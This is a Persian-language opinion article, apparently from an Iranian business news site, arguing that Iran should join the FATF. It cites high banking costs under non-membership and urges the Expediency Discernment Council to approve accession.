البته برخی هم در ادعاهایی عجیب، مدعی شدند که پیوستن به این نهاد یعنی تسلیم کردن شهید عزیز، سردار سلیمانی به دشمنان. این ادعاها کاملاً بی اساس و نادرست است. «اف.ای.تی.اف» در سال ۱۹۸۶ با هدف مبارزه با پولشویی و پول‌های کثیف در اقتصاد جهانی به وجود آمد و بعد از حوادث ۱۱ سپتامبر مبارزه با تأمین مالی تروریسم هم به مجموعه ضوابط آن اضافه شد. به رغم ادعای برخی منتقدان، در مقررات «اف.ای.تی.اف» یا کنوانسیون‌های مورد بحث، اساساً هیچ قید یا ضرورتی برای در اختیار گذاشتن اطلاعات محرمانه و کلیدی کشور، نه فقط به کشورهای متخاصم، بلکه به کشورهای دوست هم وجود ندارد.

درصورت بازگشت همه طرف‌ها به برجام، اگر ایران «اف.ای.تی.اف» را نپذیرد، نخواهد توانست با نظام بانکی جهان کار کند. چه بسا حتی بانک‌های درجه ۲ و ۳ اروپایی هم با ما کار نخواهند کرد. کما اینکه امروز هم نه تنها بانک‌های درجه یک چینی با ما کار نمی کنند، بلکه بانک‌های زیر پله ای چین نیز با هزینه ای گزاف حاضر به همکاری با ما می‌شوند.

به عنوان مثال اگر قرار باشد ۱۰۰ یورو برای ما در یک کشور اروپایی گشایش اعتبار انجام دهند، ۲۰ درصد یعنی ۲۰ یورو هزینه این اقدام را از ما طلب می‌کنند. این هزینه ۲۰ درصدی که به خاطر نپیوستن به «اف.ای.تی.اف» بر کشور و مردم ما تحمیل می‌شود، در همه مبادلات بانکی و خریدهای خارجی ایران جاری است و مصداق دارد.

در کنار همه استدلال‌هایی که درباره ضرورت پیوستن ایران به «اف. ای. تی.اف» وجود دارد، منتقدان باید به این واقعیت هم پاسخ دهند که اگر «اف.ای.تی.اف» بد است، چرا بزرگ‌ترین شرکای تجاری ما یعنی چین، روسیه و ترکیه عضو اصلی «اف.ای.تی.اف» هستند؟ آن هم در حالی که درصورت پیوستن ما به این نهاد تنظیم کننده مبادلات بانکی، ما در کنار ۱۸۹ کشور دیگر عضو همکار «اف.ای.تی.اف» خواهیم بود، نه مانند روسیه، چین و ترکیه عضو اصلی. بنابراین برای آنکه سیستم بانکی ما بتواند با سیستم بانکی دنیا کار کند، باید این مقررات را بپذیریم و اگر نپذیریم، در شرایط موجود هزینه آن از جیب ملت ایران پرداخت خواهد شد.

در این میان، یک نکته مهم که مسأله را برای فعالان اقتصادی و مردم ایران بغرنج کرده است، طولانی شدن فرایند تصمیم‌گیری در مجمع تشخیص مصلحت نظام است. امروز همه کارشناسان سیاسی و اقتصادی کشور اذعان دارند که مصلحت نظام در این است که نظام بانکی ایران بتواند با نظام بانکی دنیا کار کند. اما اگر مصلحت این است که ایران منزوی شود یا به سمت زیمبابوه شدن برود، پس نباید به «اف.ای.تی.اف» بپیوندیم. چراکه براساس سند چشم انداز، ایران می‌بایست یکی از کشورهای نخست منطقه در همه عرصه‌ها به ویژه اقتصاد می‌بود. اما امروز به دلیل مشکلات ساختاری و انباشت مسائل متعدد به این جایگاه دست نیافتیم. در چنین شرایطی، نپیوستن به «اف.ای.تی.اف» به سایر مسائل و مشکلات اضافه شده و عملاً یک هزینه ۲۰ درصدی دیگری را به ملت ایران، در همه خریدهای خارجی آن تحمیل خواهد کرد. از این رو از مجمع تشخیص مصلحت انتظار می‌رود به مصلحت واقعی وعینی کشور توجه کرده و یک خودتحریمی دیگری را به تحریم‌های ظالمانه امریکا علیه نظام اسلامی و مردم تحمیل نکنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران